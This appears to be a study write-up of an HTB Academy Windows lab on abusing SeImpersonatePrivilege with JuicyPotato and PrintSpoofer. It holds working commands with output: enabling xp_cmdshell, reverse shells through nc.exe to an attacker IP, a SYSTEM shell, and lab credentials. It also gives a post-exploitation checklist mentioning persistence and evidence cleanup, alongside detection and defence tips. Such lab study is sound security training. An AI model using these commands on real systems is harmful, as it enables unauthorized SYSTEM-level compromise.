🥔SeImpersonate & SeAssignPrimaryToken

🎯 Overview

SeImpersonate and SeAssignPrimaryToken are powerful privileges that allow escalation from service accounts to SYSTEM level access. These privileges enable processes to impersonate other users' security tokens, commonly exploited through "Potato-style" attacks.

🔑 Token Impersonation Fundamentals

Access Token Concepts

• Process tokens contain security context information

• Token impersonation allows assuming another user's identity

• SeImpersonatePrivilege required to utilize stolen tokens

• Memory-based attacks target token locations in process memory

Key Privileges

SeImpersonatePrivilege        # Impersonate client after authentication
SeAssignPrimaryTokenPrivilege # Replace process level token

Common Service Account Context:

• IIS application pools

• SQL Server service accounts

• Jenkins execution contexts

• MSSQL xp_cmdshell execution

🥔 Potato Attack Family

Attack Mechanism

1. Service account has SeImpersonatePrivilege but limited SYSTEM access

2. Potato attack tricks SYSTEM process to connect to attacker-controlled process

3. Token handover occurs during connection authentication

4. Token abuse elevates privileges to NT AUTHORITY\SYSTEM

JuicyPotato - Legacy Systems

Prerequisites

• SeImpersonate OR SeAssignPrimaryToken privilege

• Windows Server 2016 and earlier (before build 1809)

• DCOM/NTLM reflection capabilities

Basic Usage

# Basic privilege escalation
JuicyPotato.exe -l [listening_port] -p c:\windows\system32\cmd.exe -a "/c [command]" -t *

# Reverse shell example
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

Parameters:

• -l - COM server listening port

• -p - Program to launch

• -a - Arguments passed to program

• -t - CreateProcess call type (* = try both)

PrintSpoofer - Modern Systems

Advantages

• Windows Server 2019 and Windows 10 build 1809+ compatible

• Print Spooler service abuse mechanism

• Multiple execution modes available

Usage Examples

# Interactive SYSTEM shell in current console
PrintSpoofer.exe -i -c cmd

# Desktop SYSTEM process (RDP sessions)
PrintSpoofer.exe -d -c cmd

# Reverse shell execution
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

RoguePotato - Alternative Approach

• OXID resolver abuse technique

• Named pipe impersonation method

• Server 2019 and Windows 10 compatible

💻 Practical Exploitation Scenario

SQL Server Service Account Compromise

Initial Access via MSSQL

# Connect with mssqlclient.py
mssqlclient.py sql_dev@10.129.43.30 -windows-auth

# Enable xp_cmdshell
SQL> enable_xp_cmdshell

# Verify service account context
SQL> xp_cmdshell whoami
# Output: nt service\mssql$sqlexpress01

Privilege Assessment

SQL> xp_cmdshell whoami /priv

# Key privileges to identify:
SeAssignPrimaryTokenPrivilege # Replace process level token - Disabled
SeImpersonatePrivilege        # Impersonate client after authentication - Enabled
SeManageVolumePrivilege       # Perform volume maintenance tasks - Enabled

JuicyPotato Exploitation

# Upload JuicyPotato.exe and nc.exe to target
# Set up listener: nc -lnvp 8443

# Execute privilege escalation
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

# Expected output:
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

PrintSpoofer Alternative

# Modern Windows systems
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

# Expected output:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Verification

# Confirm SYSTEM access
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname  
WINLPE-SRV01

🛠️ Tool Comparison

Tool	OS Support	Method	Reliability
JuicyPotato	≤ Server 2016	DCOM/NTLM Reflection	High
PrintSpoofer	Server 2019+ Win10 1809+	Print Spooler Service	High
RoguePotato	Server 2019+ Win10+	OXID Resolver	Medium
SweetPotato	Universal	Multiple methods	High

🎯 HTB Academy Lab Solution

Lab Environment

• Target: 10.129.43.43 (ACADEMY-WINLPE-SRV01)

• Credentials: sql_dev:Str0ng_P@ssw0rd!

• Objective: Escalate privileges and retrieve flag

Detailed Step-by-Step Solution

1. Initial Connection with MSSQL

┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ mssqlclient.py sql_dev@10.129.43.43 -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: Str0ng_P@ssw0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed database context to 'master'.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 19162) 
[!] Press help for extra shell commands
SQL> 

2. Enable xp_cmdshell for Command Execution

SQL> enable_xp_cmdshell

[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

3. Enumerate Privileges - Key Step!

SQL> xp_cmdshell whoami /priv

output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

PRIVILEGES INFORMATION                                                             
----------------------                                                             
NULL                                                                               

Privilege Name                Description                               State      
============================= ========================================= ========   
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    
SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
SeCreateGlobalPrivilege       Create global objects                     Enabled    
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

NULL   

✅ Critical Finding: SeImpersonatePrivilege is Enabled - this allows privilege escalation!

4. Set Up Reverse Shell Listener (New Terminal)

┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ nc -lvnp 8443

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443

5. Execute PrintSpoofer Privilege Escalation

SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "C:\tools\nc.exe 10.10.14.143 8443 -e cmd.exe"

output                                                                             
--------------------------------------------------------------------------------   
[+] Found privilege: SeImpersonatePrivilege                                        
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

6. Receive SYSTEM Shell

┌─[us-academy-1]─[10.10.14.143]─[htb-ac330204@pwnbox-base]─[~]
└──╼ [★]$ nc -lvnp 8443

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
Ncat: Connection from 10.129.43.43.
Ncat: Connection from 10.129.43.43:49699.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

7. Verify SYSTEM Access & Retrieve Flag

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
WINLPE-SRV01

# Retrieve the flag
C:\Windows\system32>type C:\Users\Administrator\Desktop\SeImpersonate\flag.txt
[FLAG_CONTENT_HERE]

Alternative Methods

Using JuicyPotato (for older systems)

# If PrintSpoofer fails, try JuicyPotato
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.143 8443 -e cmd.exe" -t *

Key Success Indicators

1. ✅ SeImpersonatePrivilege Enabled - Confirmed in step 3

2. ✅ PrintSpoofer Success Message - [+] Found privilege: SeImpersonatePrivilege

3. ✅ SYSTEM Shell Received - whoami returns nt authority\system

4. ✅ Flag Retrieved - Successfully read from Administrator desktop

Troubleshooting Common Issues

If PrintSpoofer Fails:

# Try alternative tools based on OS version:
# Windows Server 2016 and below: JuicyPotato
# Windows 10/Server 2019+: PrintSpoofer, RoguePotato

If Connection Issues:

# Verify firewall rules and network connectivity
# Try different ports: 443, 80, 8080, 9001

If Tools Not Present:

# Upload tools first (may require web shell or other upload method)
# Or use PowerShell-based alternatives

🔍 Detection Indicators

Process Behavior

# Unusual SYSTEM processes spawned from service accounts
# COM server listening on high ports
# Named pipe creation by non-privileged accounts
# Print Spooler service interactions

Event Logs

• Event ID 4648 - Explicit credential logon (token impersonation)

• Event ID 4672 - Special privileges assigned to logon

• Event ID 4624 - Account logon events

🛡️ Defense Strategies

Privilege Hardening

# Remove SeImpersonate from service accounts
# Implement least-privilege principles
# Regular privilege audits

Detection Rules

# Monitor for:
- JuicyPotato.exe execution
- PrintSpoofer.exe execution  
- Unusual token impersonation events
- SYSTEM processes spawned by service accounts

📋 SeImpersonate Exploitation Checklist

Prerequisites

• Service account access (web shell, SQL, Jenkins)

• SeImpersonatePrivilege OR SeAssignPrimaryTokenPrivilege

• Tool upload capability (JuicyPotato/PrintSpoofer)

• Network connectivity for reverse shells

Execution Steps

• Verify privileges (whoami /priv)

• Select appropriate tool based on OS version

• Upload exploitation binary to target system

• Set up reverse shell listener on attack machine

• Execute privilege escalation command

• Confirm SYSTEM access (whoami)

Post-Exploitation

• Retrieve sensitive data (flags, credentials)

• Establish persistence (user creation, services)

• Lateral movement preparation

• Evidence cleanup (optional)

💡 Key Takeaways

1. SeImpersonate privilege is extremely powerful for privilege escalation

2. Service accounts commonly have this privilege enabled

3. Tool selection depends on target OS version and build

4. Multiple techniques available - always have backups ready

5. Common attack vector - expect this in most web applications

6. High success rate when prerequisites are met

---

SeImpersonate privilege escalation remains one of the most reliable Windows privilege escalation techniques, particularly in service account compromise scenarios.